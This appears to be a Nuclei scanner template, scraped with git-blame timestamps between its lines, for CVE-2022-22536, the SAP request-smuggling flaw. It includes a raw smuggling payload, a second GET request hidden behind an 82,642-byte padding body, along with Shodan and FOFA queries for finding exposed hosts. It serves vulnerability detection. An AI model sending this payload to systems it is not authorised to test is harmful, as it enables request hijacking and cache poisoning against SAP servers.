2022-02-25 17:59:02 +00:00
id : CVE-2022-22536
info :
2022-03-08 15:09:38 +00:00
name : SAP Memory Pipes (MPI) Desynchronization
2022-02-25 17:59:02 +00:00
author : pdteam
severity : critical
2022-05-17 09:18:12 +00:00
description : SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive data and potential data leakage.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches and updates provided by SAP to mitigate this vulnerability.
2022-02-25 17:59:02 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
- https://github.com/Onapsis/onapsis_icmad_scanner
- https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
2023-07-11 19:49:27 +00:00
- https://launchpad.support.sap.com/#/notes/3123396
2022-03-03 21:20:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 10
2022-03-03 21:20:41 +00:00
cve-id : CVE-2022-22536
cwe-id : CWE-444
2024-05-31 19:23:20 +00:00
epss-score : 0.96479
epss-percentile : 0.99584
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:*
2022-07-21 18:26:54 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : sap
product : content_server
2023-09-06 11:59:08 +00:00
shodan-query : http.favicon.hash:-266008933
2024-05-31 19:23:20 +00:00
fofa-query : icon_hash=-266008933
2022-08-19 09:45:36 +00:00
tags : cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev
2022-02-25 17:59:02 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-25 17:59:02 +00:00
- raw :
- |+
GET {{sap_path}} HTTP/1.1
Host : {{Hostname}}
Content-Length : 82646
Connection : keep-alive
{{repeat("A", 82642)}}
GET / HTTP/1.1
Host : {{Hostname}}
payloads :
2023-07-11 19:49:27 +00:00
sap_path :
# based on https://github.com/Onapsis/onapsis_icmad_scanner
2022-02-25 17:59:02 +00:00
- /sap/admin/public/default.html
- /sap/public/bc/ur/Login/assets/corbu/sap_logo.png
2023-07-11 19:49:27 +00:00
stop-at-first-match : true
2022-02-25 17:59:02 +00:00
unsafe : true
read-all : true
2023-07-11 19:49:27 +00:00
2022-02-25 17:59:02 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
2023-07-11 19:49:27 +00:00
- "contains(tolower(body), 'administration')"
- "contains(tolower(header), 'content-type: image/png')"
2022-02-25 17:59:02 +00:00
condition : or
- type : word
part : body
words :
2022-03-05 15:27:11 +00:00
- "HTTP/1.0 400 Bad Request" # error in concatenated response
- "HTTP/1.0 500 Internal Server Error"
- "HTTP/1.0 500 Dispatching Error"
2022-03-03 21:18:25 +00:00
condition : or
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a004730450220625e735423251591072249e5f4c141a534b0b1abf0e798f02463087caee9f42c022100a73cdb01bbb0719b01521f92e0e2542f481efa8d92ad61f31787a51cf819d1a2:922c64590222798bb761d5b6d8e72950